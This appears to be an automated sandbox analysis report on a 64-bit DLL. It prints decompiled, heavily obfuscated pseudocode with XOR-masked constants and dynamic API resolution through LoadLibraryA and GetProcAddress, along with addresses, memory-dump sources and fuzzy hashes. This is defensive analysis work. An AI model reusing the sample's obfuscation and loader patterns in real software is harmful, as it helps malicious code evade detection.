				 *(_t256 + 0x80) =  *(_t256 + 0x80) ^ 0x000027b2;
				if (0x343b != _t260) goto 0x130e93f0;
				goto 0x130e95f7;
				if ( *(_t256 + 0x110) - ((r10d ^ 0x000027b2) &  *(_t256 + 0x28)) > 0) goto 0x130e95a4;
				_t214 =  *_t256;
				r11d =  *(_t256 + 0x110);
				r11d = r11d | _a96;
				r12d =  *(_t256 + 0x228);
				r11d = r11d ^ _t214;
				r9d =  *(_t256 + 0x1c0);
				r14d = _t269 + _t269;
				r8d =  *(_t256 + 0x90);
				r15d = r9d;
				r8d = r8d & 0x00000188;
				r15d = r15d ^ _a80;
				r8d = r8d | 0x00002626;
				_t262 = _t273 + 0x0000228c ^ _a40;
				r12d = r12d * _t214;
				 *(_t256 + 0x70) =  *(_t256 + 0x70) - _t262;
				_t198 =  *((intOrPtr*)(_t256 + 0x1e0));
				r12d = r12d &  *(_t256 + 0x1b8);
				_a112 = ( *(_t256 + 0x80) ^ 0xfffffe7f) & 0x00002598;
				_t172 =  *(_t256 + 0x188);
				r13d = _t172;
				r13d = r13d | _a24;
				_t173 =  *(_t256 + 0x200);
				r13d = r13d - r10d;
				r10d = _a72;
				r10d = r10d + _t198;
				r10d = r10d + _a16;
				_v88 = ( *(_t256 + 0x1f8) | _v72) + _a64;
				_v96 = r10d;
				_v104 = r11d;
				_v112 = _t256;
				_v120 = _v68 ^ 0x000027ae;
				_v128 =  *(_t256 + 0x1b0) * _t173;
				_v136 = _t173 & r10d ^  *(_t256 + 0x40);
				_v144 = _a64 + _t198 ^ _t172;
				_v152 = r14d;
				_v160 = r15d;
				_v168 = r12d;
				E00007FFC7FFC130FED60(_a112, r13d, _t229, _a40, _t256, _t262, _t269,  *(_t256 + 0x80) ^ 0x000027b2,  *((intOrPtr*)(_t256 + 0x30)), _t285 + 0x130);
				 *(_t256 + 0x200) =  *(_t256 + 0x200) - _t262;
				DeleteCriticalSection(??);
				goto 0x130e95f7;
				if ( *(_t256 + 0x90) == ( *((intOrPtr*)(_t256 + 0xc8)) -  *((intOrPtr*)(_t256 + 0x60)) ^ 0x00002598)) goto 0x130e95f7;
				_t272 =  *(_t256 + 0x120) |  *(_t256 + 0x70);
				if (r13d - _t272 >= 0) goto 0x130e95f7;
				r13d = r13d + 1;
				if (r13d - _t272 < 0) goto 0x130e95e2;
				 *((long long*)(_t256 + 0x220)) =  *((intOrPtr*)(_t256 + 0x220)) + (r12d ^ 0x000030d5);
				return _a56 + 0xfffff21d;
			}









































                                0x7ffc130e90b0
                                0x7ffc130e90ce
                                0x7ffc130e90d5
                                0x7ffc130e90dd
                                0x7ffc130e90e4
                                0x7ffc130e90f3
                                0x7ffc130e90fb
                                0x7ffc130e910f
                                0x7ffc130e9123
                                0x7ffc130e9136
                                0x7ffc130e914a
                                0x7ffc130e9152
                                0x7ffc130e9159
                                0x7ffc130e916c
                                0x7ffc130e9174
                                0x7ffc130e917b
                                0x7ffc130e9189
                                0x7ffc130e9191
                                0x7ffc130e9198
                                0x7ffc130e919f
                                0x7ffc130e91ad
                                0x7ffc130e91bc
                                0x7ffc130e91ca
                                0x7ffc130e91d7
                                0x7ffc130e91ed
                                0x7ffc130e91f1
                                0x7ffc130e91f8
                                0x7ffc130e9203
                                0x7ffc130e9208
                                0x7ffc130e920d
                                0x7ffc130e9211
                                0x7ffc130e9219
                                0x7ffc130e921d
                                0x7ffc130e9222
                                0x7ffc130e9226
                                0x7ffc130e922b
                                0x7ffc130e922f
                                0x7ffc130e9234
                                0x7ffc130e923b
                                0x7ffc130e9241
                                0x7ffc130e9248
                                0x7ffc130e924f
                                0x7ffc130e9269
                                0x7ffc130e9275
                                0x7ffc130e9280
                                0x7ffc130e9283
                                0x7ffc130e9286
                                0x7ffc130e9290
                                0x7ffc130e929d
                                0x7ffc130e929f
                                0x7ffc130e92ad
                                0x7ffc130e92b7
                                0x7ffc130e92bc
                                0x7ffc130e92c2
                                0x7ffc130e92c7
                                0x7ffc130e92df
                                0x7ffc130e92e8
                                0x7ffc130e92f1
                                0x7ffc130e92f9
                                0x7ffc130e92fe
                                0x7ffc130e9311
                                0x7ffc130e9320
                                0x7ffc130e9327
                                0x7ffc130e932e
                                0x7ffc130e9333
                                0x7ffc130e933a
                                0x7ffc130e9347
                                0x7ffc130e934e
                                0x7ffc130e935f
                                0x7ffc130e9369
                                0x7ffc130e936e
                                0x7ffc130e9371
                                0x7ffc130e9376
                                0x7ffc130e937b
                                0x7ffc130e9380
                                0x7ffc130e938a
                                0x7ffc130e9391
                                0x7ffc130e93a8
                                0x7ffc130e93ae
                                0x7ffc130e93b6
                                0x7ffc130e93c4
                                0x7ffc130e93dd
                                0x7ffc130e93ea
                                0x7ffc130e93f9
                                0x7ffc130e9413
                                0x7ffc130e9415
                                0x7ffc130e942e
                                0x7ffc130e9434
                                0x7ffc130e943c
                                0x7ffc130e9443
                                0x7ffc130e944b
                                0x7ffc130e9452
                                0x7ffc130e9455
                                0x7ffc130e945c
                                0x7ffc130e9460
                                0x7ffc130e9467
                                0x7ffc130e9471
                                0x7ffc130e9478
                                0x7ffc130e9480
                                0x7ffc130e9492
                                0x7ffc130e9495
                                0x7ffc130e9499
                                0x7ffc130e949d
                                0x7ffc130e94b0
                                0x7ffc130e94bc
                                0x7ffc130e94c3
                                0x7ffc130e94c9
                                0x7ffc130e94ce
                                0x7ffc130e94d1
                                0x7ffc130e94d7
                                0x7ffc130e94f1
                                0x7ffc130e9500
                                0x7ffc130e950a
                                0x7ffc130e9522
                                0x7ffc130e9526
                                0x7ffc130e952b
                                0x7ffc130e9530
                                0x7ffc130e9535
                                0x7ffc130e9540
                                0x7ffc130e9544
                                0x7ffc130e9548
                                0x7ffc130e954c
                                0x7ffc130e9551
                                0x7ffc130e9556
                                0x7ffc130e955b
                                0x7ffc130e957e
                                0x7ffc130e959c
                                0x7ffc130e95a2
                                0x7ffc130e95bc
                                0x7ffc130e95c5
                                0x7ffc130e95cf
                                0x7ffc130e95e2
                                0x7ffc130e95ee
                                0x7ffc130e95f0
                                0x7ffc130e961d

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CriticalDeleteSection
                                • String ID: @
                                • API String ID: 166494926-2766056989
                                • Opcode ID: 67b7e4b7d29307a53d3832543a141100a8672ce9b9caf98ece6757bfb83f9feb
                                • Instruction ID: f6e26b13be22ae32d92d309f828c8c061cd17a1958827622a16ecc931032f548
                                • Opcode Fuzzy Hash: 67b7e4b7d29307a53d3832543a141100a8672ce9b9caf98ece6757bfb83f9feb
                                • Instruction Fuzzy Hash: EDD154736186C58BD364CF24E494BEAB7A4F788758F044139DB8A57B88DB38E990CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EFB70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00007FFC7FFC130EFB70(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed long long _t15;
				signed long long _t16;
				void* _t24;
				signed long long _t33;

				_t15 = _t33;
				 *((long long*)(_t15 + 8)) = __rbx;
				 *((long long*)(_t15 + 0x10)) = __rbp;
				 *((long long*)(_t15 + 0x18)) = __rsi;
				 *((long long*)(_t15 + 0x20)) = __rdi;
				_t16 = _t15 | 0xffffffff;
				_t24 = _t16 + 1;
				if ( *((char*)(__rcx + _t24)) != 0) goto 0x130efba0;
				if (_t24 + __rdx - _t16 - __r8 <= 0) goto 0x130efbdb;
				return __rdx + 0xb;
			}







                                0x7ffc130efb70
                                0x7ffc130efb73
                                0x7ffc130efb77
                                0x7ffc130efb7b
                                0x7ffc130efb7f
                                0x7ffc130efb8d
                                0x7ffc130efba0
                                0x7ffc130efba7
                                0x7ffc130efbb7
                                0x7ffc130efbda

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                • Opcode ID: a5c22a8428412bf3b9384cd49374f5d3c3e3a1ab06a7deca538eca9ebce93d66
                                • Instruction ID: 88739cb1910cf7f7e0e4ba99ec83bca8e9f87904eade4c2f1ddd7c782aeb0233
                                • Opcode Fuzzy Hash: a5c22a8428412bf3b9384cd49374f5d3c3e3a1ab06a7deca538eca9ebce93d66
                                • Instruction Fuzzy Hash: 22310B22B18EA945F7209A22D8047AA6AD1AB85BF8F158335DE6C17BC5CE3CD525C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130FB9B0 Relevance: 3.3, APIs: 2, Instructions: 285libraryloaderCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 56%
                                			E00007FFC7FFC130FB9B0(intOrPtr __edx, signed int __rcx, signed int __rdx, long long __rsi, signed int __rbp, void* __r8, long long __r9, long long __r12, long long __r13, long long __r14, void* _a8, intOrPtr _a16, signed int _a24, signed long long _a32) {
				void* _v32;
				void* _v40;
				void* _v48;
				void* _v56;
				signed int _t163;
				void* _t183;
				void* _t186;
				void* _t187;
				void* _t189;
				signed long long _t202;
				long long _t226;
				signed long long _t229;
				signed long long _t235;
				signed int _t245;
				signed int _t265;
				intOrPtr _t269;
				signed long long _t276;
				signed long long _t281;
				signed long long _t284;
				signed long long _t285;
				intOrPtr _t291;
				struct HINSTANCE__* _t292;
				intOrPtr* _t294;
				signed long long _t296;
				long long* _t299;
				void* _t304;
				signed long long _t309;
				intOrPtr _t312;
				intOrPtr _t314;
				void* _t316;
				signed long long _t318;
				intOrPtr* _t322;
				signed long long* _t326;
				CHAR* _t328;

				_t316 = _t304;
				 *((long long*)(_t316 + 0x20)) = __r9;
				 *(_t316 + 0x18) = r8d;
				_a16 = __edx;
				_t314 =  *((intOrPtr*)(__rcx + 0x118));
				_t245 = __rcx;
				r15d = r8d;
				if ( *((intOrPtr*)(_t314 + 0x88 + __rcx * 8)) == 0) goto 0x130fbeec;
				 *((long long*)(_t316 - 0x30)) = __r13;
				r13d =  *((intOrPtr*)(_t314 + 0x90));
				 *(__rcx + 0xc8) =  *(__rcx + 0xc8) | 0x0acff869;
				_t322 = __r13 + 0xc +  *((intOrPtr*)(__rcx + 0xc0));
				if ( *_t322 == 0) goto 0x130fbedc;
				 *((long long*)(_t316 + 8)) = __rbp;
				 *((long long*)(_t316 - 0x20)) = __rsi;
				 *((long long*)(_t316 - 0x28)) = __r12;
				 *((long long*)(_t316 - 0x38)) = __r14;
				_t19 = _t245 + 0x198; // 0x229b
				_t326 = _t19;
				_t202 =  *(__rcx + 0x188) ^  *(__rcx + 0x120) ^ 0x00003189;
				 *(__rcx + 0x120) = _t202;
				LoadLibraryA(_t328);
				_t318 = _t202;
				if (_t202 == 0) goto 0x130fbea2;
				 *_t326 = _t326;
				 *(__rcx + 0x1e0) =  *(__rcx + 0x228) ^ __rbp;
				_t299 = __rsi +  *((intOrPtr*)(__rcx + 0xc0));
				 *( *((intOrPtr*)(__rcx + 0x30)) + 0xe8) =  *( *((intOrPtr*)(__rcx + 0x30)) + 0xe8) ^  *(__rcx + 0xc8) + 0x0000329d;
				if ( *((intOrPtr*)(_t322 - 0xc)) !=  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x1c8)) + 0x130)) - 0x23f7) goto 0x130fbb6c;
				_t183 =  *( *((intOrPtr*)(__rcx + 0x1a0)) + 0x130) * 0xc285f6d4 - 0x228d;
				if (_t183 == 0) goto 0x130fbb03;
				if (_t183 != 0) goto 0x130fbaf6;
				 *(__rcx + 0x1b0) = __rdx |  *_t326;
				_t281 =  *(__rcx + 0x1e0);
				 *(__rcx + 0x100) =  *(__rcx + 0x100) + _t281 * 0x1f2c;
				 *( *(__rcx + 0x40) + 0x198) =  *( *(__rcx + 0x40) + 0x198) | _t281 + 0x00001f2c;
				_t163 =  *(__rcx + 0x200) * 0x51e8c56e;
				r8d =  *(__rcx + 0xb0) * 0xf993a29a;
				if (_t163 - __r8 > 0) goto 0x130fbc27;
				if (_t163 + 1 - __r8 <= 0) goto 0x130fbb51;
				 *_t326 =  *_t326 + (__rbp ^  *_t326);
				goto 0x130fbc27;
				_t186 =  *((intOrPtr*)( *__rcx + 0x188)) + 0x1407 - 0x343a;
				if (_t186 == 0) goto 0x130fbbac;
				_t309 = __rbp | 0x00003a59;
				if (_t186 != 0) goto 0x130fbba0;
				 *_t326 =  *_t326 - _t309;
				 *_t326 =  *_t326 *  *(__rcx + 0x110) * 0x343a;
				_t294 = _t299 +  *((intOrPtr*)(__rcx + 0xc0));
				_t187 = ( *(__rcx + 0x200) ^ 0x00000db8) - 0x3a5a;
				if (_t187 == 0) goto 0x130fbbfd;
				_t284 = __rbp ^ 0x0000343a;
				if (_t187 != 0) goto 0x130fbbf3;
				 *(__rcx + 0x78) = _t284;
				 *(__rcx + 0x1b0) =  *(__rcx + 0x1b0) ^ ( *(__rcx + 0x1b8) | 0x00003189);
				 *((long long*)( *(__rcx + 0x40) + 0xf0)) =  *((intOrPtr*)(__rcx + 0x70)) - 0x2103;
				 *( *(__rcx + 0x40) + 0x58) =  *(__rcx + 0x100) | _t328;
				if ( *_t294 == 0) goto 0x130fbe4e;
				asm("o16 nop [eax+eax]");
				_t189 =  *( *((intOrPtr*)(__rcx + 0x30)) + 0xb8) * 0x244f8775 - 0x30d6;
				if (_t189 == 0) goto 0x130fbc9a;
				_t265 =  *(__rcx + 0x1e0);
				asm("o16 nop [eax+eax]");
				_t285 = _t284 - 1;
				if (_t189 != 0) goto 0x130fbc80;
				 *(__rcx + 0x1e0) = _t265 + 1;
				 *(__rcx + 0x1b8) = _t265;
				_t312 =  *_t294;
				if (_t312 >= 0) goto 0x130fbd3c;
				r8d =  *( *((intOrPtr*)(_t318 + 0x3c)) + _t318 + 0x88 + _t285 * 8);
				_t269 =  *((intOrPtr*)(__rcx + 0x1c8));
				r8d =  *(_t309 + _t318 + 0x1c);
				 *(__rcx + 0x1e0) =  *(__rcx + 0x1e0) +  *((intOrPtr*)(_t269 + 0x1b0));
				 *((long long*)(_t269 + 0x1b0)) =  *((long long*)(_t269 + 0x1b0)) + 1;
				r9d =  *((intOrPtr*)(_t309 +  *(__rcx + 0x40) * (_t285 -  *(__rcx + 0x40)) + _t318));
				 *( *((intOrPtr*)(__rcx + 0x1a0)) + 0xe0) =  *( *((intOrPtr*)(__rcx + 0x1a0)) + 0xe0) |  *((intOrPtr*)( *__rcx + 0x198)) + _t328;
				 *_t299 = _t312 + _t318;
				_t226 = __rbp -  *_t326;
				 *((intOrPtr*)(__rcx + 0x48)) =  *((intOrPtr*)(__rcx + 0x48)) + _t226;
				goto 0x130fbdea;
				GetProcAddress(_t292);
				 *_t299 = _t226;
				_t291 =  *((intOrPtr*)(__rcx + 0x1c8));
				if ( *((intOrPtr*)(__rcx + 0x130)) - _t318 > 0) goto 0x130fbd81;
				 *((intOrPtr*)(__rcx + 0x90)) =  *((intOrPtr*)(__rcx + 0x90)) +  *((intOrPtr*)(__rcx + 0x48)) - 0x2032;
				if ( *((intOrPtr*)(_t291 + 0x130)) - 0x3c5 - 0x3a59 >= 0) goto 0x130fbdab;
				_t229 =  *(__rcx + 0x110);
				 *(__rcx + 0xc8) = _t229;
				 *(__rcx + 0x110) = _t229 + 1;
				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x1c0)) + 0x218)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x1c0)) + 0x218)) + 0xfffffe78 - __rcx;
				if ( *__rcx -  *((intOrPtr*)(__rcx + 0x140)) < 0) goto 0x130fbdea;
				_t235 = __rbp ^ 0x00001f2c;
				 *(__rcx + 0x1b0) =  *(__rcx + 0x1b0) | _t235;
				r8d = 0x36e7;
				r8d = r8d + 1;
				 *((intOrPtr*)(__rcx + 0x1f8)) =  *((intOrPtr*)(__rcx + 0x1f8)) - _t235 * 0x2598;
				if (r8d != _t291) goto 0x130fbdf4;
				 *(__rcx + 0x220) =  *(__rcx + 0x1b0) ^  *(__rcx + 0x220) ^ 0x00003595;
				if ( *((long long*)(_t294 + 8)) != 0) goto 0x130fbc50;
				_t296 = _a32;
				r15d = _a24;
				_t276 =  *(__rcx + 0x1e0) - _t296 |  *(__rcx + 0x1e0);
				 *(__rcx + 0x1e0) = _t276;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x1a0)) + 0x200)) - 0x544 - 0x329e >= 0) goto 0x130fbe9e;
				 *_t326 =  *_t326 + _t276 * _t296 * _t296;
				 *_t326 =  *_t326 ^ 0x00001663;
				if ( *((intOrPtr*)(_t322 + 0x14)) != 0) goto 0x130fba40;
				return 0;
			}





































                                0x7ffc130fb9b0
                                0x7ffc130fb9b3
                                0x7ffc130fb9b7
                                0x7ffc130fb9bb
                                0x7ffc130fb9c7
                                0x7ffc130fb9ce
                                0x7ffc130fb9da
                                0x7ffc130fb9f0
                                0x7ffc130fb9f6
                                0x7ffc130fb9fa
                                0x7ffc130fba01
                                0x7ffc130fba10
                                0x7ffc130fba1c
                                0x7ffc130fba22
                                0x7ffc130fba26
                                0x7ffc130fba2a
                                0x7ffc130fba2e
                                0x7ffc130fba32
                                0x7ffc130fba32
                                0x7ffc130fba4e
                                0x7ffc130fba54
                                0x7ffc130fba66
                                0x7ffc130fba6c
                                0x7ffc130fba72
                                0x7ffc130fba86
                                0x7ffc130fba94
                                0x7ffc130fbaa3
                                0x7ffc130fbaaa
                                0x7ffc130fbac8
                                0x7ffc130fbadf
                                0x7ffc130fbae5
                                0x7ffc130fbafa
                                0x7ffc130fbafc
                                0x7ffc130fbb03
                                0x7ffc130fbb18
                                0x7ffc130fbb26
                                0x7ffc130fbb2d
                                0x7ffc130fbb37
                                0x7ffc130fbb48
                                0x7ffc130fbb62
                                0x7ffc130fbb64
                                0x7ffc130fbb67
                                0x7ffc130fbb7b
                                0x7ffc130fbb81
                                0x7ffc130fbb89
                                0x7ffc130fbba7
                                0x7ffc130fbba9
                                0x7ffc130fbbbe
                                0x7ffc130fbbcb
                                0x7ffc130fbbd8
                                0x7ffc130fbbde
                                0x7ffc130fbbe8
                                0x7ffc130fbbf7
                                0x7ffc130fbbf9
                                0x7ffc130fbc0e
                                0x7ffc130fbc20
                                0x7ffc130fbc35
                                0x7ffc130fbc3d
                                0x7ffc130fbc47
                                0x7ffc130fbc5f
                                0x7ffc130fbc65
                                0x7ffc130fbc67
                                0x7ffc130fbc77
                                0x7ffc130fbc86
                                0x7ffc130fbc8a
                                0x7ffc130fbc8c
                                0x7ffc130fbc93
                                0x7ffc130fbc9a
                                0x7ffc130fbca0
                                0x7ffc130fbcbe
                                0x7ffc130fbcc6
                                0x7ffc130fbcd6
                                0x7ffc130fbcfb
                                0x7ffc130fbd02
                                0x7ffc130fbd0c
                                0x7ffc130fbd26
                                0x7ffc130fbd2d
                                0x7ffc130fbd30
                                0x7ffc130fbd33
                                0x7ffc130fbd37
                                0x7ffc130fbd4d
                                0x7ffc130fbd53
                                0x7ffc130fbd56
                                0x7ffc130fbd6e
                                0x7ffc130fbd7a
                                0x7ffc130fbd91
                                0x7ffc130fbd93
                                0x7ffc130fbd9a
                                0x7ffc130fbda4
                                0x7ffc130fbdbc
                                0x7ffc130fbdd8
                                0x7ffc130fbddd
                                0x7ffc130fbde3
                                0x7ffc130fbdee
                                0x7ffc130fbdfb
                                0x7ffc130fbe05
                                0x7ffc130fbe23
                                0x7ffc130fbe3d
                                0x7ffc130fbe48
                                0x7ffc130fbe55
                                0x7ffc130fbe5d
                                0x7ffc130fbe65
                                0x7ffc130fbe6f
                                0x7ffc130fbe88
                                0x7ffc130fbe9b
                                0x7ffc130fbea2
                                0x7ffc130fbeb2
                                0x7ffc130fbedb

                                APIs
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,00007FFC130FDB93,?,?,?,?,?,?,?,00007FFC130FAD80), ref: 00007FFC130FBA66
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00007FFC130FDB93,?,?,?,?,?,?,?,00007FFC130FAD80), ref: 00007FFC130FBD4D
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID:
                                • API String ID: 2574300362-0
                                • Opcode ID: b8fb5429e7cfc8db786e1fc3a60dd63ed19924fa30ef64d9c899e3a35c4c87c6
                                • Instruction ID: 78240237656abe3eef44154fe10b9a48f11be62b1585807952f3114f14da6cdd
                                • Opcode Fuzzy Hash: b8fb5429e7cfc8db786e1fc3a60dd63ed19924fa30ef64d9c899e3a35c4c87c6
                                • Instruction Fuzzy Hash: BCD16732705B9886EB45CF29D9987AD37A8F748B98F098136CE4D8B398DF38D950C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130FF8F0 Relevance: 3.2, Strings: 2, Instructions: 737COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E00007FFC7FFC130FF8F0(void* __ebx, void* __esi, void* __eflags, long long __rcx, long long __rdx, signed int* __r8, long long __r9, signed int* __r11) {
				void* __rbx;
				intOrPtr _t480;
				signed char _t492;
				signed int _t495;
				char _t508;
				intOrPtr _t509;
				signed int _t510;
				intOrPtr _t531;
				short _t543;
				intOrPtr _t548;
				intOrPtr _t549;
				intOrPtr _t553;
				intOrPtr _t557;
				signed int _t563;
				signed int _t582;
				signed int _t583;
				signed long long _t591;
				void* _t603;
				intOrPtr _t612;
				intOrPtr _t641;
				signed int _t669;
				signed int _t683;
				signed int _t695;
				signed int _t717;
				signed int _t719;
				void* _t731;
				void* _t733;
				void* _t734;
				intOrPtr _t737;
				long long _t738;
				intOrPtr _t741;
				long long _t742;
				intOrPtr _t743;
				long long _t744;
				signed long long _t745;
				long long _t746;
				signed long long _t748;
				intOrPtr _t752;
				signed long long _t755;
				intOrPtr _t756;
				intOrPtr _t763;
				signed long long _t765;
				intOrPtr _t767;
				intOrPtr _t772;
				signed long long _t774;
				intOrPtr _t776;
				signed long long _t777;
				intOrPtr _t778;
				signed long long _t780;
				signed long long _t781;
				intOrPtr _t782;
				signed long long _t783;
				signed long long _t784;
				signed long long _t791;
				signed long long _t792;
				signed long long _t793;
				signed long long _t794;
				signed long long _t795;
				intOrPtr _t798;
				intOrPtr _t803;
				signed long long _t806;
				signed long long _t807;
				signed int* _t811;
				signed int* _t812;
				signed int* _t813;
				signed int* _t814;
				signed int* _t816;
				signed long long _t819;
				intOrPtr _t822;
				signed long long _t842;
				signed long long _t845;
				intOrPtr _t853;
				signed int _t862;
				signed long long _t874;
				signed long long _t879;
				intOrPtr _t880;
				signed long long _t881;
				intOrPtr _t891;
				intOrPtr* _t892;
				signed long long _t893;
				signed long long _t897;
				signed int _t901;
				intOrPtr _t902;
				signed long long _t904;
				signed long long _t910;
				intOrPtr _t914;
				intOrPtr _t919;
				signed long long _t922;
				signed long long _t935;
				signed long long _t936;
				intOrPtr _t941;
				void* _t946;
				void* _t947;
				signed long long _t953;
				intOrPtr _t955;
				signed long long _t972;
				intOrPtr _t973;
				signed int _t974;
				signed int* _t979;
				intOrPtr _t984;
				signed long long _t994;
				signed long long _t996;
				signed long long _t1004;
				signed long long _t1007;
				long long _t1010;
				intOrPtr _t1011;
				intOrPtr _t1012;
				signed long long _t1017;
				long long _t1023;

				_t603 = __ebx;
				 *((long long*)(_t946 + 0x20)) = __r9;
				 *((long long*)(_t946 + 0x10)) = __rdx;
				 *((long long*)(_t946 + 8)) = __rcx;
				_push(_t1010);
				_t947 = _t946 - 0xe8;
				_t737 =  *0x13124140; // 0x0
				_t888 = __rcx;
				r11d =  *0x13124123 & 0x000000ff;
				_t811 = __r8;
				r8d =  *0x1312416c & 0x0000ffff;
				_t1023 = __r9;
				 *((long long*)(_t947 + 0x80)) = __r11;
				 *(_t947 + 0x64) =  *(_t737 + 0x194c) & 0x0000ffff;
				r8w = r8w + 0xffff;
				 *(_t947 + 0x90) = __r11;
				_t738 =  *0x13124180; // 0x0
				r11d = 0x1581;
				 *((long long*)(_t947 + 0xc8)) = _t738;
				 *0x13124180 = _t738 + 1;
				 *0x1312416c = r8w;
				_t819 =  *__r8;
				r10d = r8w & 0xffffffff;
				r8w = r8w + 1;
				r9d = r8w & 0xffffffff;
				 *((long long*)(_t947 + 0xa0)) = __r9;
				 *((long long*)(_t947 + 0x88)) =  *((intOrPtr*)(__rcx + _t819 * 4));
				_t741 =  *0x13124188; // 0x0
				_t742 =  *((intOrPtr*)(_t947 + 0x168));
				 *((long long*)(_t947 + 0xa8)) = _t742;
				_t743 =  *0x13124158; // 0x0
				_t744 = _t743 + 1;
				 *0x1312416c = r8w;
				 *0x13124158 = _t744;
				 *((long long*)(_t947 + 0xb8)) = _t744;
				 *(_t947 + 0x60) =  *0x1312414c & 0x000000ff;
				_t745 =  *0x13124124;
				 *(_t947 + 0xb0) =  *(_t741 + 0x10 + _t819 * 4) ^  *(_t742 + 0x3360);
				_t822 =  *0x13124160; // 0x0
				_t1004 = _t745 ^ 0x00001a15;
				 *(_t947 + 0x70) = _t1004;
				 *(_t947 + 0xd0) = _t745;
				 *(_t947 + 0xc0) = _t745;
				_t746 =  *0x13124170; // 0x0
				 *((long long*)(_t947 + 0x98)) = _t746;
				r13d =  *( *__r8 + _t822) & 0x000000ff;
				_t31 = _t888 + 3; // 0x3
				_t748 =  *0x131241a0; // 0x0
				 *((long long*)(_t947 + 0x78)) = _t1010;
				 *((char*)(_t748 + 0x598)) = ( *(_t31 + 0x868) & 0x000000ff) + 0x32;
				_t480 =  *0x13124134; // 0x0
				r10d = r10d | ( *( *((intOrPtr*)(_t947 + 0x180)) +  *__r8 * 2) & 0x0000ffff) + _t480;
				 *0x13124134 = _t480 + 1;
				 *(_t947 + 0x68) = r10d;
				 *0x13124150 = __rcx + 0x97b;
				_t972 =  *0x13124158; // 0x0
				r10d =  *0x13124133 & 0x000000ff;
				r8d = r8d + 1;
				_t752 =  *0x13124160; // 0x0
				 *0x13124148 = r8d;
				 *__r8 =  *__r8 - 1;
				 *(_t947 + 0x50) =  *__r8;
				 *((intOrPtr*)(_t947 + 0x48)) = r10b;
				 *(_t947 + 0x40) =  *0x13124148 + 0x1580;
				 *(_t947 + 0x38) =  *( *(_t947 + 0x160) + 0x38fe) & 0x0000ffff;
				 *(_t947 + 0x30) = ( *(( *__r11 << 2) + _t752) & 0x000000ff) / ( *( *(_t947 + 0x170) + _t972 * 2) & 0x0000ffff);
				 *(_t947 + 0x28) = 0x14f9;
				 *(_t947 + 0x20) = 0x13b6;
				_t492 = E00007FFC7FFC130E42A0(0xa3f, __r8,  *0x13124148, _t972);
				_t953 =  *((intOrPtr*)(_t947 + 0x80));
				_t973 =  *((intOrPtr*)(_t947 + 0x150));
				 *0x13124132 = _t492;
				 *(0x423 + _t1004 * 8) =  *(0x423 + _t1004 * 8) | 0x00000806;
				_t755 =  *_t811;
				_t891 =  *0x131241a8; // 0x0
				_t892 = _t891 +  *_t953;
				 *_t892 = ( *( *((intOrPtr*)(_t947 + 0x178)) + 0x10 + _t755 * 4) & 0xea) -  *_t892;
